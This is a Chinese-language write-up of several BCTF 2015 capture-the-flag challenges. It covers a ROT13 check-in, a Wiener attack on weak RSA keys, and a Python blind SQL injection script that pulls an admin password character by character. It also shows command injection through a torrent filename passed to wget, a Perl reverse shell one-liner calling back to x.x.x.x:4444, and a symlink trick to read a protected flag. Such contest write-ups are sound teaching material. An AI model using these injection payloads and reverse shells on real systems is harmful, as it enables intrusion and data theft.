BCTF2015-writeup

正文之前还是写点废话吧,实力不行,能力不够,被虐的惨惨的

简单写个文章作为记录吧

checkin-10

登陆IRC BCTF频道后,最上面有一段字符串

看了下目测是ROT13,解密后得到flag

warmup-50

c=0x1e04304936215de8e21965cfca9c245b1a8f38339875d36779c0f123c475bc24d5eef50e7d9ff5830e80c62e8083ec55f27456c80b0ab26546b9aeb8af30e82b650690a2ed7ea407dcd094ab9c9d3d25a93b2140dcebae1814610302896e67f3ae37d108cd029fae6362ea7ac1168974c1a747ec9173799e1107e7a56d783660418ebdf6898d7037cea25867093216c2c702ef3eef71f694a6063f5f0f1179c8a2afe9898ae8dec5bb393cdffa3a52a297cd96d1ea602309ecf47cd009829b44ed3100cf6194510c53c25ca7435f60ce5f4f614cdd2c63756093b848a70aade002d6bc8f316c9e5503f32d39a56193d1d92b697b48f5aa43417631846824b5e86

http://dl.bctf.cn/warmup-c6aa398e4f3e72bc2ea2742ae528ed79.pub.xz

题目给了一个加密后的c值和一个rsa的公钥文件

把公钥文件用openssl 分解出n和e

然后脑洞不够大,一直想着直接分解n,然后算出私钥d,结果跑了半天都没跑出来,后来搜到一个rsa的漏洞

rsa wiener attack, 在github上找了一个代码,修改了之后顺利跑出明文m:

import ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator
import sys
sys.setrecursionlimit(1000000)

def hack_RSA(e,n):
    '''
    Finds d knowing (e,n)
    applying the Wiener continued fraction attack
    '''
    frac = ContinuedFractions.rational_to_contfrac(e, n)
    convergents = ContinuedFractions.convergents_from_contfrac(frac)
    
    for (k,d) in convergents:
        
        #check if d is actually the key
        if k!=0 and (e*d-1)%k == 0:
            phi = (e*d-1)//k
            s = n - phi + 1
            # check if the equation x^2 - s*x + n = 0
            # has integer roots
            discr = s*s - 4*n
            if(discr>=0):
                t = Arithmetic.is_perfect_square(discr)
                if t!=-1 and (s+t)%2==0:
                    print("Hacked!")
                    return d

# TEST functions

def modexp( g, u, p):
    s = 1
    while u !=0:
        if u & 1:
            s = (s * g)%p
        u >>=1
        g = (g * g)%p
    return s
    
    
if __name__ == "__main__":
    n = 109966163992903243770643456296093759130737510333736483
	3523454886434326142010306299702070479301156522685312220795
	0823098704186977976077607210573845712338712496103611121054
	4028669181361694095594938869077306417325203381820822917059
	6514298570933886188184372826248579275512858115426852692297
	0559416637042615212889590191470990203736565257573020189736
	1139518816164746228733410283595236405985958414491372301878
	7186357086052564449212229452676258530911266913588334532837
	4416661746325782137556615567586845203240196172781431448134
	3467702299949407935602389342183536222842556906657001984320
	973035314726867840698884052182976760066141
    e = 307496863058020618163345911672840307344780314277514955
	2792238809938192117262056931094541800746730645416001459782
	8390709770861577479329793948103408489494025272834473555854
	8350441533749785544144163050122676439578389986486511007054
	4687597957367576760538733373387653752835323707662609455336
	7977134079292593746416875606876735717905892280664538346000
	9503436716552570463640672214698071382328204460157698824721
	6055184005292193035798833430665912025311479063849648009236
	1951536576427295789429197483597859657977832368912534761100
	2690655093513450507589436746510534199825610944322581036148
	30448382949765459939698951824447818497599
    c = 606274341290288145674049692516978078794337750990892760
	3601541063926190188626322069047958795564564772923712662789
	4599166136756811335873604339498869129719440656776867314172
	7562250237542334762012178434051477072046065064894099819399
	9860464456847190138808648947061917192786791962238408572209
	3956759241836499067639379179411120052281316958208007504576
	2021373003428274182548526200853603022333588359510349328083
	9356765829185138506415852577466670238295585251123305336290
	2277921857534414199997716231020668999139795251740005513044
	2765748367993645556655607935354522316628355435999327255117
	66192196706414172508995359134072584232582
    #test_is_perfect_square()
    #print("-------------------------")
    #test_hack_RSA()
    d = hack_RSA(e,n)
    print hex(modexp(c,d,n))

然后将m转成ascii就得到了flag

sqli_engine-200

发现有注入,但是有过滤,写了个盲注脚本跑出来的:

import httplib
import time
import string
import sys
import random
import urllib

headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) 
	AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_letters)
for i in range(0,10):
    payloads.append(str(i))
payloads += ['@','_', '.','{','}','-']
print 'start to retrive user:'
user = ''
for i in range(1,len(payloads)):
    for payload in payloads:
	print '.',
        conn = httplib.HTTPConnection('104.197.7.111:8080', timeout=10)
        s = "admin' and substr(password from %s for 1)=%s#" % (i, hex(ord(payload)))
        conn.request(method='POST',
			url="/login" ,						 
			body="password=222&username=" + urllib.quote(s),
			headers = headers)
        html_doc = conn.getresponse().read()
        conn.close()
        #print s
        if (html_doc.find(u'c5475050ed61fd11bd10cb7f1ad7a729')>0):
            user += payload
	    sys.stdout.write('\r[In progress] %s' % user)
	    sys.stdout.flush()
	    break
print '\n[Done]password is', user

torrent_lover-233


经过一番摸索,应该是传入的url直接带入wget 里面执行命令,那么我们可以用命令注入

构造·command·.torrent,发现执行任何命令都没有回显,那么就反弹一个shell,但是直接用nc反弹,连接上后就直接断开,然后找了一个perl不依赖/bin/bash 的perl脚本:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:4444");
STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

在用的时候所有的空格都用tab替换了

然后成功弹回了shell,locate flag 发现:

/var/www/flag/use_me_to_read_flag /var/www/flag/flag

然后运行:

/var/www/flag/use_me_to_read_flag /var/www/flag/flag

Permission denied

查找后发现了一个linux命令 ln,通过ln新建文件指向/var/www/flag/flag,然后读取新建的文件可以绕过限制:

ln -s /var/www/flag/flag zhongzi/test

/var/www/flag/use_me_to_read_flag zhongzi/test

成功读取到flag

 

 

About the Author

admin

Leave a Reply

Your email address will not be published. Required fields are marked *